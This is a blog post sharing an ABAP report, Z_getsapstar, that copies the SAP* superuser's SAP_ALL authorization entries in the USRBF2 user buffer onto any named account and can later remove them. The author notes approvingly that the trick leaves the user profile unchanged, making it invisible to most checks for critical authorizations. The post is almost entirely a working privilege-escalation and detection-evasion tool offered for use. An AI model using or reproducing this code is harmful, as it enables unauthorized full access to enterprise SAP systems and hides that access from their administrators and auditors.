Saturday, December 20, 2014

HOW TO GET SAP ALL MORE AUTHORIZATIONS SAP ABAP

Hi Folks,
this is from an old friend of mine. I reproduce it here with his authorization

*
*Copyright (C) 2005  Krapinskij (krapinskij@yahoo.it)
*
*This program is free software; you can redistribute it and/or
*modify it under the terms of the GNU General Public License
*as published by the Free Software Foundation; either version 2
*of the License, or (at your option) any later version.
*
*This program is distributed in the hope that it will be useful,
*but WITHOUT ANY WARRANTY; without even the implied warranty of
*MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*GNU General Public License for more details.
*
*You should have received a copy of the GNU General Public License
*along with this program; if not, write to the Free Software
*Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
*
*&---------------------------------------------------------------------*
*& Report  Z_getsapstar
*&                                                                     *
*&---------------------------------------------------------------------*
*&                                                                     *
*&                                                                     *
*&---------------------------------------------------------------------*

REPORT  Z_getsapstar                            .

PARAMETERS clean TYPE boole_d AS CHECKBOX.
PARAMETERS uname TYPE sy-uname.
PARAMETERS mandt TYPE sy-mandt DEFAULT '010'.

IF uname IS INITIAL.
  uname = sy-uname.
ENDIF.

DATA zusr04 LIKE usr04 .
DATA zust04 LIKE ust04 .
DATA zprofs  LIKE usr04-profs.
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.


IF clean IS INITIAL.
  SELECT *  FROM  usrbf2 CLIENT SPECIFIED
     INTO TABLE zusrbf2
        WHERE mandt = mandt AND
            bname = 'SAP*' AND
            auth = '&_SAP_ALL' .
  IF sy-subrc NE 0.
    WRITE: / 'Nothing found in this client. Try another'.
    EXIT.
  ENDIF.
  LOOP AT zusrbf2.
    zusrbf2-bname = uname.
    MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
  ENDLOOP.
  INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.
ELSE.
  DELETE FROM usrbf2 WHERE bname = uname AND
                      auth  = '&_SAP_ALL'.
ENDIF.

The nice thing is that it does not change the user profile, but only the user buffer for authorization. So it is invisible to most programs checking users for critical authorizations.
at